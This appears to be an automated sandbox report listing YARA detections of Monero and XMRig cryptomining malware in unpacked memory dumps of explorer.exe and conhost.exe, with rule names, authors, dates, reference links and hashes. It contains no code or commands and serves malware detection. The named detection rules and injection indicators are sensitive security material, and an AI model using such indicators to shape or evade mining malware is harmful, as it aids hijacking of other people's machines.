Source: 27.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 21.2.conhost.exe.224e882d2d0.7.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 21.2.conhost.exe.224e882d2d0.7.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 21.2.conhost.exe.224e8d2d308.8.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 21.2.conhost.exe.224e8d2d308.8.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
